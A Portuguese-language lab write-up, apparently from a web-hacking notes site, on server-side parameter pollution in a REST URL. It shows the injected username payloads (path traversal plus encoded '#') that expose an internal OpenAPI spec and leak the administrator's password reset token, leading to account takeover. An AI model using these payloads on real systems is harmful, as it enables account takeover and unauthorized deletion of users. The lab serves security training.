> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/web/api-testing/server-side-parameter-pollution-in-a-rest-url.md).

# Poluição de parâmetros no lado do servidor em uma URL REST

### Explorando a poluição de parâmetros do lado do servidor em uma URL REST

**Objetivo do laboratório**/ Faça login como administrador\*\* e delete o usuário**carlos**.

#### 1. Funcionalidade « Esqueci a senha »

Você acessa o recurso Esqueci a senha e insere o nome de usuário **administrador**.

<figure><img src="/files/22fcaad06ba08a1f1909875d5a96891b8ca84953" alt=""><figcaption></figcaption></figure>

A solicitação enviada ao servidor é a seguinte:

```bash
POST /forgot-password

csrf=CiKtg4vkiqLtNS3lAtIhUaMNSuOfnjh1&username=administrator
```

Resposta obtida:

```json
{
    "result":"*****@normal-user.net",
    "type":"email"
}
```

<figure><img src="/files/5c9f44afc5fb3e59c57c6ff29a345a675c0d239b" alt=""><figcaption></figcaption></figure>

#### 2. Análise do código JavaScript do lado do cliente

O código JavaScript mostra que o `nome de usuário` valor é enviado como está na consulta, sem validação adicional no servidor.

```javascript
let forgotPwdReady = (callback) => {
    if (document.readyState !== "loading") callback();
    else document.addEventListener("DOMContentLoaded", callback);
}

function urlencodeFormData(fd){
    let s = '';
    function encode(s){ return encodeURIComponent(s).replace(/%20/g,'+'); }
    for(let pair of fd.entries()){
        if(typeof pair[1]=='string'){
            s += (s?'&':'') + encode(pair[0])+'='+encode(pair[1]);
        }
    }
    return s;
}

const validateInputsAndCreateMsg = () => {
    try {
        const forgotPasswordError = document.getElementById("forgot-password-error");
        forgotPasswordError.textContent = "";
        const forgotPasswordForm = document.getElementById("forgot-password-form");
        const usernameInput = document.getElementsByName("username").item(0);
        if (usernameInput && !usernameInput.checkValidity()) {
            usernameInput.reportValidity();
            return;
        }
        const formData = new FormData(forgotPasswordForm);
        const config = {
            method: "POST",
            headers: {
                "Content-Type": "x-www-form-urlencoded",
            },
            body: urlencodeFormData(formData)
        };
        fetch(window.location.pathname, config)
            .then(response => response.json())
            .then(jsonResponse => {
                if (!jsonResponse.hasOwnProperty("result"))
                {
                    forgotPasswordError.textContent = "Nome de usuário inválido";
                }
                else
                {
                    forgotPasswordError.textContent = `Por favor, verifique seu e-mail: "${jsonResponse.result}"`;
                    forgotPasswordForm.className = "";
                    forgotPasswordForm.style.display = "none";
                }
            })
            .catch(err => {
                forgotPasswordError.textContent = "Nome de usuário inválido";
            });
    } catch (error) {
        console.error("Erro inesperado:", error);
    }
}

const displayMsg = (e) => {
    e.preventDefault();
    validateInputsAndCreateMsg(e);
};

forgotPwdReady(() => {
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    const resetToken = urlParams.get('reset-token');
    if (resetToken)
    {
        window.location.href = `/forgot-password?passwordResetToken=${resetToken}`;
    }
    else
    {
        const forgotPasswordBtn = document.getElementById("forgot-password-btn");
        forgotPasswordBtn.addEventListener("click", displayMsg);
    }
});
```

Isso sugere que o valor pode ser interpretado como parte do caminho da API do backend.

#### 3. Tentativas de poluir o `nome de usuário` Parâmetro

* Adicionado um `#` no final do parâmetro:

```bash
&username=administrator#
```

Resposta:

```json
{
  "type": "error",
  "result": "Rota inválida. Consulte a definição da API"
}
```

* Tentativa de cruzar caminhos:

```bash
&username=../../../../administrator
```

Resposta: erro de Não Encontrado do servidor da API.

{% code overflow="wrap" %}

```json
{
  "error": "Resposta inesperada do servidor da API:/n<html>/n<head>/n    <meta charset=/"UTF-8/">/n    <title>Não encontrado<//title>/n<//head>/n<body>/n    <h1>Não encontrado<//h1>/n    <p>A URL que você solicitou não foi encontrada.<//p>/n<//body>/n<//html>/n"
}
```

{% endcode %}

<figure><img src="/files/68bdd63c3f8bc354d72ba0cf0f4c55a27af1fe6a" alt=""><figcaption></figcaption></figure>

#### 4. Descoberta da documentação OpenAPI

Combinando cruzamento de diretórios e `#` caractere:

{% code overflow="wrap" %}

```bash
csrf=CiKtg4vkiqLtNS3lAtIhUaMNSuOfnjh1&username=../../../../administrator%23
```

{% endcode %}

Ele retorna `openapi.json` com um grande comprimento de resposta.

<figure><img src="/files/d38413a8b366aac0026dc532cbdac5f16bf33259" alt=""><figcaption></figcaption></figure>

* Mensagem de erro:

```json
{
  "error": "Resposta inesperada do servidor da API:/n{/n  /"openapi/": /"3.0.0/",/n  /"info/": {/n    /"title/": /"API de Usuário/",/n    /"version/": /"2.0.0/"/n  },/n  /"paths/": {/n    /"/api/internal/v1/users/{username}/field/{field}/": {/n      /"get/": {/n        /"tags/": [/n          /"users/"/n        ],/n        /"summary/": /"Encontrar usuário pelo nome de usuário/",/n        /"description/": /"Versão 1 da API/",/n        /"parameters/": [/n          {/n            /"name/": /"username/",/n            /"in/": /"path/",/n            /"description/": /"Nome de usuário/",/n            /"required/": true,/n            /"schema/": {/n        ..."
}
```

<figure><img src="/files/4e9b5eb99e0768b062b7113f2839229fb72a6a39" alt=""><figcaption></figcaption></figure>

O servidor retorna um erro contendo **OpenAPI** documentação, revelando rotas internas disponíveis, incluindo:

```bash
/api/internal/v1/users/administrator/field/{field}
```

#### 5. Exploração da API interna

O `nome de usuário` o parâmetro é ajustado para atingir a API diretamente:

```bash
administrator/field/test%23
```

```json
{
  "type": "error",
  "result": "Esta versão da API só oferece suporte ao campo de e-mail por razões de segurança"
}
```

<figure><img src="/files/6cf58f908ddec661b1a2c90b0f6bbbd4edfd0263" alt=""><figcaption></figcaption></figure>

Resposta válida com e-mail do admin.

```bash
&username=administrator/field/email%23
```

<figure><img src="/files/b24c4f2d67bee95153bc5fe81c022a1dc3a26cc1" alt=""><figcaption></figcaption></figure>

#### 6. Recuperação do token de redefinição

```bash
../../v1/users/administrator
```

<figure><img src="/files/2040b78ed452aeeeb45f26af9e9deba34d8205ea" alt=""><figcaption></figcaption></figure>

Testando outros campos expostos pela API:

<figure><img src="/files/6b5ed74745b6359742f3a9481adf524aa1a50ca2" alt=""><figcaption></figcaption></figure>

```bash
&username=../../v1/users/administrator/field/passwordResetToken%23
```

Resposta:

```json
{
  "type": "passwordResetToken",
  "result": "guw2qorqvfcpqohuv92wb460x4da485o"
}
```

<figure><img src="/files/9607ed0d963de42230df1a8a91c62f77c4785032" alt=""><figcaption></figcaption></figure>

#### 7. Redefinir a senha do administrador

O token recuperado é usado para acessar a página de redefinição:

```bash
/forgot-password?passwordResetToken=guw2qorqvfcpqohuv92wb460x4da485o
```

Isso permite que você defina uma nova senha para **administrador**, depois conecte-se e exclua o usuário **carlos**.

<figure><img src="/files/31e039a5ffd65c10edde350f0028b757a897deec" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/web/api-testing/server-side-parameter-pollution-in-a-rest-url.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
